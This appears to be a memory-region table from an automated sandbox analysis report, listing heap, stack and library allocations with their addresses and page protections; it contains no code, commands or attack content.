trusted library allocation
page read and write
423F000
trusted library allocation
page read and write
2111F505000
heap
page read and write
69B000
heap
page read and write
996A9FE000
stack
page read and write
4206000
trusted library allocation
page read and write
249D1060000
heap
page read and write
26CC4E00000
heap
page read and write
42CA000
trusted library allocation
page read and write
21417E000
stack
page read and write
4249000
trusted library allocation
page read and write
464E000
trusted library allocation
page read and write
226958F0000
heap
page read and write
16F6D2C0000
heap
page read and write
58E000
stack
page read and write
2D622DC0000
heap
page read and write
1F4A84F7000
heap
page read and write
5B6000
heap
page read and write
1B43FE89000
heap
page read and write
3D229AC000
stack
page read and write
68B000
heap
page read and write
ACD000
stack
page read and write
4243000
trusted library allocation
page read and write
464B000
trusted library allocation
page read and write
2CA5000
heap
page read and write
2C8D000
heap
page read and write
2CB6000
heap
page read and write
2B90000
heap
page read and write
42D8000
trusted library allocation
page read and write
2951E7C0000
heap
page read and write
425D000
trusted library allocation
page read and write
4235000
trusted library allocation
page read and write
BCC8EFF000
stack
page read and write
5757E7C000
stack
page read and write
E9C0BEF000
unkown
page read and write
20C097F7000
heap
page read and write
4644000
trusted library allocation
page read and write
424E000
trusted library allocation
page read and write
5757EFF000
unkown
page read and write
2E8F000
stack
page read and write
3AB5B5F000
unkown
page read and write
3D22D7E000
stack
page read and write
16F6D320000
heap
page read and write
268EEE00000
heap
page read and write
226958A5000
heap
page read and write
1F4A84E7000
heap
page read and write
2107DCC8000
heap
page read and write
303C8FE000
stack
page read and write
3AB5EFF000
stack
page read and write
E9C0F7E000
stack
page read and write
4250000
trusted library allocation
page read and write
14EAD000
stack
page read and write
CBADAFF000
unkown
page read and write
14CE3000
heap
page read and write
14CE3000
heap
page read and write
22913880000
heap
page read and write
2D622EA0000
heap
page read and write
272D2BC0000
heap
page read and write
268EECE0000
heap
page read and write
20C097B5000
heap
page read and write
1BED1A30000
heap
page read and write
ED276FF000
stack
page read and write
4241000
trusted library allocation
page read and write
19B6E465000
heap
page read and write
2CAB000
heap
page read and write
2107DEF5000
heap
page read and write
97F7000
trusted library allocation
page read and write
1B43FE00000
heap
page read and write
22443AF0000
heap
page read and write
14E6D000
unkown
page read and write
423C000
trusted library allocation
page read and write
22913580000
heap
page read and write
DC9967F000
unkown
page read and write
C26407C000
stack
page read and write
575807E000
stack
page read and write
129223D0000
heap
page read and write
272D2D00000
heap
page read and write
996A8FE000
stack
page read and write
9812000
trusted library allocation
page read and write
272D2D05000
heap
page read and write
1475CCE0000
heap
page read and write
4632000
trusted library allocation
page read and write
1BED166F000
heap
page read and write
5757F7F000
stack
page read and write
272D2CC0000
heap
page read and write
6A1294F000
unkown
page read and write
14D03000
heap
page read and write
14C5C000
heap
page read and write
463C000
trusted library allocation
page read and write
226958B0000
heap
page read and write
14EFE000
unkown
page read and write
2107DB60000
heap
page read and write
48C000
stack
page read and write
C26427E000
stack
page read and write
21F2000
trusted library allocation
page execute and read and write
16F6D337000
heap
page read and write
7C2693C000
stack
page read and write
268EEEC0000
heap
page read and write
4208000
trusted library allocation
page read and write
83D000
stack
page read and write
4AC9C7F000
stack
page read and write
4245000
trusted library allocation
page read and write
42E2000
trusted library allocation
page read and write
249D0E50000
heap
page read and write
14C93000
heap
page read and write
303C56C000
stack
page read and write
16ED49A0000
heap
page read and write
2C50000
heap
page read and write
1BED1860000
heap
page read and write
3D6D8EC000
stack
page read and write
299D000
stack
page read and write
7DF5A8C000
stack
page read and write
2107DCD7000
heap
page read and write
129223E0000
heap
page read and write
12922455000
heap
page read and write
1B43FD00000
heap
page read and write
2C4E000
stack
page read and write
55DD7FE000
stack
page read and write
3D6D9EF000
stack
page read and write
45E6000
trusted library allocation
page read and write
42E7000
trusted library allocation
page read and write
2D622EC0000
heap
page read and write
73A000
heap
page read and write
1B43FE80000
heap
page read and write
4646000
trusted library allocation
page read and write
1D62D645000
heap
page read and write
4218000
trusted library allocation
page read and write
14C83000
heap
page read and write
45E9000
trusted library allocation
page read and write
1D62D640000
heap
page read and write
4212000
trusted library allocation
page read and write
2E6E000
stack
page read and write
1482E000
unkown
page read and write
26CC4E99000
heap
page read and write
2BF0000
remote allocation
page read and write
55DD6FE000
unkown
page read and write
1B43FE05000
heap
page read and write
21FB000
trusted library allocation
page execute and read and write
E9C0B6C000
stack
page read and write
6A129CF000
stack
page read and write
6A12CFE000
stack
page read and write
45E4000
trusted library allocation
page read and write
2CE5000
heap
page read and write
66DA27C000
stack
page read and write
249D0F5B000
heap
page read and write
16ED4980000
heap
page read and write
DC997FE000
stack
page read and write
2C9A000
heap
page read and write
16F6D327000
heap
page read and write
1B43FE10000
heap
page read and write
1475CED7000
heap
page read and write
20C09730000
heap
page read and write
16F6D4D0000
heap
page read and write
60E000
stack
page read and write
14C9D000
heap
page read and write
2951E9D5000
heap
page read and write
1279D185000
heap
page read and write
2111F269000
heap
page read and write
20C09760000
heap
page read and write
14C2D000
heap
page read and write
26CC51F5000
heap
page read and write
149FE000
heap
page read and write
42F1000
trusted library allocation
page read and write
268EED09000
heap
page read and write
4648000
trusted library allocation
page read and write
423A000
trusted library allocation
page read and write
2CCC000
heap
page read and write
20C097B0000
heap
page read and write
66DA47E000
stack
page read and write
4CC88AC000
stack
page read and write
2107DCDF000
heap
page read and write
1A95A7E000
unkown
page read and write
4AC9CFE000
stack
page read and write
19B6E420000
heap
page read and write
1475CDC0000
heap
page read and write
21B0000
trusted library allocation
page execute and read and write
4641000
trusted library allocation
page read and write
14C7C000
heap
page read and write
1279CFF0000
heap
page read and write
463F000
trusted library allocation
page read and write
142F0000
trusted library allocation
page read and write
2CAB000
heap
page read and write
2CA5000
heap
page read and write
2D622F00000
heap
page read and write
422F000
trusted library allocation
page read and write
19B6E400000
heap
page read and write
4228000
trusted library allocation
page read and write
1BED1840000
heap
page read and write
2CE5000
heap
page read and write
ED2777E000
stack
page read and write
14C20000
heap
page read and write
BCC8FFE000
stack
page read and write
1F4A8440000
heap
page read and write
2951E9D0000
heap
page read and write
14D0F000
heap
page read and write
ED273AC000
stack
page read and write
26CC4EAE000
heap
page read and write
14D13000
heap
page read and write
4CC8CFE000
stack
page read and write
7C26CFE000
stack
page read and write
970000
trusted library allocation
page read and write
14CEC000
heap
page read and write
1D62D46D000
heap
page read and write
1BED1650000
heap
page read and write
680000
heap
page read and write
1F4A84FD000
heap
page read and write
1A957CC000
stack
page read and write
4226000
trusted library allocation
page read and write
4CC892F000
unkown
page read and write
213DDF000
stack
page read and write
2D623105000
heap
page read and write
462F000
trusted library allocation
page read and write
DC9977E000
stack
page read and write
16ED4890000
heap
page read and write
ED277FF000
stack
page read and write
1279D1D7000
heap
page read and write
26CC4E90000
heap
page read and write
1279D1E9000
heap
page read and write
3AB5BDF000
stack
page read and write
3D22CFF000
stack
page read and write
1BED1657000
heap
page read and write
4AC996C000
stack
page read and write
9B5000
heap
page read and write
1475CDE0000
heap
page read and write
3D6DCFE000
stack
page read and write
3D6D96F000
unkown
page read and write
303C5EF000
unkown
page read and write
14D0F000
heap
page read and write
1279D0F0000
heap
page read and write
422D000
trusted library allocation
page read and write
14759000
heap
page read and write
1D62D450000
heap
page read and write
14D6D000
heap
page read and write
14E1D000
stack
page read and write
CBADB7E000
stack
page read and write
1475CEC7000
heap
page read and write
19B6E460000
heap
page read and write
14C4C000
heap
page read and write
D09B18E000
unkown
page read and write
2247000
trusted library allocation
page execute and read and write
149E1000
heap
page read and write
26CC4E30000
heap
page read and write
D09B4FE000
stack
page read and write
16ED4A69000
heap
page read and write
2C83000
heap
page read and write
2111F0A0000
heap
page read and write
4223000
trusted library allocation
page read and write
D09B57E000
stack
page read and write
4202000
trusted library allocation
page read and write
1B43FEA0000
heap
page read and write
97E4000
trusted library allocation
page read and write
22443E00000
heap
page read and write
26CC4EA7000
heap
page read and write
64E000
stack
page read and write
CBADA7C000
stack
page read and write
2111F500000
heap
page read and write
1F4A8500000
heap
page read and write
303C97F000
stack
page read and write
1F4A8430000
heap
page read and write
26CC51F0000
heap
page read and write
1279D1F0000
heap
page read and write
422B000
trusted library allocation
page read and write
6A12C7E000
stack
page read and write
1475CEDD000
heap
page read and write
2C88000
heap
page read and write
19B6E4B0000
heap
page read and write
249D0F40000
heap
page read and write
C2640FE000
unkown
page read and write
3AB5ADC000
stack
page read and write
1475CE55000
heap
page read and write
249D0F47000
heap
page read and write
2CB4000
heap
page read and write
2111F277000
heap
page read and write
249D10D0000
heap
page read and write
14BE0000
heap
page read and write
4635000
trusted library allocation
page read and write
5B0000
heap
page read and write
1B43FE97000
heap
page read and write
249D0F5E000
heap
page read and write
7DF5B0E000
unkown
page read and write
14C73000
heap
page read and write
21B2000
trusted library allocation
page execute and read and write
42D5000
trusted library allocation
page read and write
19B6E4CC000
heap
page read and write
14C19000
heap
page read and write
226957C0000
heap
page read and write
D09B47E000
stack
page read and write
249D0F57000
heap
page read and write
272D2D20000
heap
page read and write
14290000
trusted library allocation
page read and write
1BED1760000
heap
page read and write
4255000
trusted library allocation
page read and write
22443B48000
heap
page read and write
16ED4A60000
heap
page read and write
45E2000
trusted library allocation
page read and write
2D622F1D000
heap
page read and write
2107DC40000
heap
page read and write
996A58C000
stack
page read and write
B0E000
stack
page read and write
460B000
trusted library allocation
page read and write
2F6F000
stack
page read and write
42DD000
trusted library allocation
page read and write
14C8C000
heap
page read and write
2CE5000
heap
page read and write
16ED4A83000
heap
page read and write
22913770000
heap
page read and write
2D623100000
heap
page read and write
960000
unkown
page read and write
19B6E4CF000
heap
page read and write
14CCC000
heap
page read and write
268EEEC5000
heap
page read and write
66DA2FF000
unkown
page read and write
2111F260000
heap
page read and write
1D62D2B0000
heap
page read and write
46D0000
trusted library allocation
page read and write
2D622F09000
heap
page read and write
3AB5E7E000
stack
page read and write
2269590C000
heap
page read and write
1475CE50000
heap
page read and write
2107DCC0000
heap
page read and write
42F4000
trusted library allocation
page read and write
272D2CA0000
heap
page read and write
226958A0000
heap
page read and write
462C000
trusted library allocation
page read and write
22443B5F000
heap
page read and write
89F000
stack
page read and write
2140FE000
stack
page read and write
2C70000
heap
page read and write
4204000
trusted library allocation
page read and write
984F000
trusted library allocation
page read and write
1B43FE9D000
heap
page read and write
2951E9E0000
heap
page read and write
1A95BFE000
stack
page read and write
6A128CC000
stack
page read and write
996A87F000
unkown
page read and write
2ECE000
stack
page read and write
4CC89AF000
stack
page read and write
4718000
trusted library allocation
page read and write
3D22DFF000
stack
page read and write
149F5000
heap
page read and write
4672000
trusted library allocation
page read and write
14C45000
heap
page read and write
3100000
heap
page read and write
2951E8C0000
heap
page read and write
213CDC000
stack
page read and write
2951E7C9000
heap
page read and write
295D000
stack
page read and write
229135A0000
heap
page read and write
7C26C7E000
stack
page read and write
2254000
trusted library allocation
page execute and read and write
149EB000
heap
page read and write
55DD87E000
stack
page read and write
303C87F000
stack
page read and write
2F0F000
stack
page read and write
2C00000
heap
page read and write
1F4A8785000
heap
page read and write
16F6D4D5000
heap
page read and write
1F4A8460000
heap
page read and write
2C00000
heap
page read and write
1BED1668000
heap
page read and write
268EED00000
heap
page read and write
22913570000
heap
page read and write
229135BD000
heap
page read and write
226958D0000
heap
page read and write
1486D000
stack
page read and write
1279D180000
heap
page read and write
14C6C000
heap
page read and write
2BF0000
remote allocation
page read and write
14CA4000
heap
page read and write
BCC8E7E000
unkown
page read and write
420D000
trusted library allocation
page read and write
45EB000
trusted library allocation
page read and write
4749000
trusted library allocation
page read and write
420B000
trusted library allocation
page read and write
9750000
trusted library allocation
page read and write
590000
heap
page read and write
14C63000
heap
page read and write
7DF5E7E000
stack
page read and write
42DB000
trusted library allocation
page read and write
1475CEC0000
heap
page read and write
1B43FDE0000
heap
page read and write
19B6E3F0000
heap
page read and write
BCC8F7E000
stack
page read and write
2CAB000
heap
page read and write
2107DCDC000
heap
page read and write
66DA37F000
stack
page read and write
12922477000
heap
page read and write
16F6D1C0000
heap
page read and write
2BF0000
remote allocation
page read and write
2CB4000
heap
page read and write
E9C0E7F000
stack
page read and write
268EEC00000
heap
page read and write
20C09740000
heap
page read and write
22443AE0000
heap
page read and write
4252000
trusted library allocation
page read and write
BCC8BCC000
stack
page read and write
45ED000
trusted library allocation
page read and write
16F6D33D000
heap
page read and write
DC996FF000
stack
page read and write
3D6DC7E000
stack
page read and write
4220000
trusted library allocation
page read and write
2111F180000
heap
page read and write
7C269BF000
unkown
page read and write
2C80000
heap
page read and write
42E9000
trusted library allocation
page read and write
540000
heap
page read and write
CBADC7E000
stack
page read and write
14D13000
heap
page read and write
2111F1A0000
heap
page read and write
9A0000
heap
page read and write
14D13000
heap
page read and write
2CCC000
heap
page read and write
7DF5B8F000
stack
page read and write
14C63000
heap
page read and write
2951E9A0000
heap
page read and write
14BDE000
unkown
page read and write
14CFC000
heap
page read and write
1D62D3B0000
heap
page read and write
940000
heap
page read and write
4AC9D7E000
stack
page read and write
22443B40000
heap
page read and write
4DC000
stack
page read and write
D09B10C000
stack
page read and write
268EED1D000
heap
page read and write
1D62D390000
heap
page read and write
472C000
trusted library allocation
page read and write
DC993EC000
stack
page read and write
19B6E4B9000
heap
page read and write
272D2D27000
heap
page read and write
14CDC000
heap
page read and write
1D62D467000
heap
page read and write
2C77000
heap
page read and write
3D22C7F000
unkown
page read and write
420F000
trusted library allocation
page read and write
996A97F000
stack
page read and write
C2641FE000
stack
page read and write
425B000
trusted library allocation
page read and write
1A95B7E000
stack
page read and write
736000
heap
page read and write
21407F000
stack
page read and write
16ED4975000
heap
page read and write
4AC99EE000
unkown
page read and write
2107DEF0000
heap
page read and write
14CF3000
heap
page read and write
55DD67C000
stack
page read and write
149ED000
heap
page read and write
226958F9000
heap
page read and write
14C34000
heap
page read and write
1A95AFF000
stack
page read and write
249D10D5000
heap
page read and write
2CBC000
heap
page read and write
21EA000
trusted library allocation
page execute and read and write
148BE000
unkown
page read and write
1F4A8780000
heap
page read and write
7C26D7E000
stack
page read and write
4711000
trusted library allocation
page read and write
2951E7D7000
heap
page read and write
14940000
heap
page read and write
12922470000
heap
page read and write
1D62D459000
heap
page read and write
20C0980F000
heap
page read and write
C26417F000
stack
page read and write
2C80000
heap
page read and write
1BED1A35000
heap
page read and write
224E000
trusted library allocation
page execute and read and write
45FF000
trusted library allocation
page read and write
93C000
stack
page read and write
There are 509 hidden memdumps, click here to show them.